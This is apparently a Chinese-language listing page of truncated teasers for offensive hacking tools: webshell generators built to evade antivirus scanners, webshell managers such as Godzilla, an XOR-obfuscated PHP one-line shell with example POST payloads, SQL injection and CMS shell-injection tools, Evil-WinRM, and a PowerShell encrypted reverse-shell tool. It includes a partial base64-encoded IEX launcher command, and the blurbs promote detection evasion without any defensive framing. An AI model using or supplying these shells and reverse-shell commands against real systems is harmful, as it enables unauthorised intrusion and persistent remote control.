php:asp：aspx:

生成的webshell可以绕过包括但不限于D盾、webdir+、河马、安全狗等查杀工具原理使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数项目地址GitHub: https://github.com/pureqh/webshell下载地址:①GitHub: github.com/pureqh/webshell/archive/master.zip懒得下的可直接复制…

下载地址：https://github.com/BeichenDream/Godzilla/releasesGodzilla运行环境JavaDynamicPayload->jre5及以上CShapDynamicPayload->.net2.0及以上PhpDynamicPayload->php5.0及以上简介Payload以及加密器支持哥斯拉内置了3种Payload以及6种加密器,6种支持脚本后缀,…

 天蝎权限管理工具采用Java平台的JavaFX技术开发的桌面客户端，支持跨平台运行，目前基于JDK1.8开发，运行必须安装JDK或JRE1.8，注意不能是openjdk，只能是oracle的jdk。天蝎权限管理工具基于冰蝎加密流量进行WebShell通信管理的原理，目前实现了jsp、aspx、php、asp端的常用操作功能，在原基础上，优化了无法进行大文件上传下载的问题，修改了部分AP…

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等使用说明是否传入id参数决定是否把流量编码http://www.xxx.com/shell.phpPOST:mr6=phpinfo();//与普通shell相同http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)POST:mr6=cGhwaW5mbygpOwo=//payload的base64…

jSQLInjection介绍jSQLInjection是一个轻量级SQL注入安全工具，用于从远程服务器中查找数据库信息。它是免费的，开源的和跨平台的（Windows，Linux，MacOSX）。jSQLInjection也是官方渗透测试发行版KaliLinux的一部分，并且包含在PentestBox，ParrotSecurityOS，ArchStrike或BlackArchLinux等其他渗透测…

VulnX介绍VulnX的项目介绍说：vulnx是一款智能机器人自动外壳注入器，用于检测多种类型的cms漏洞{wordpress，joomla，drupal，prestashop..}，信息收集和目标漏洞扫描，如子域名，IP信息，国家，org，timezone，region，ans等等…VulnX先分析目标网站，检查是否存在漏洞，如果存在，shell将使用dorks工具进行Injec…

Evil-WinRMSHELLWinRM是什么?WinRM =WindowsRemoteManagement，即Windows远程管理，以下简称WinRM。Evil-WinRMshell介绍此shell是用于渗透测试的终极WinRMshell。WinRM（Windows远程管理）一种标准的基于SOAP的协议，允许来自不同供应商的硬件和操作系统进行互操作。此程序可以在任何启用此功能的Win…

一个通过TCP加密（AES256位）反弹Shell的工具，使用PowerShell。使用攻击方(C2-Server监听)：PS>.\ReverseTCP.ps1目标(客户端)：ECHOIEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEk…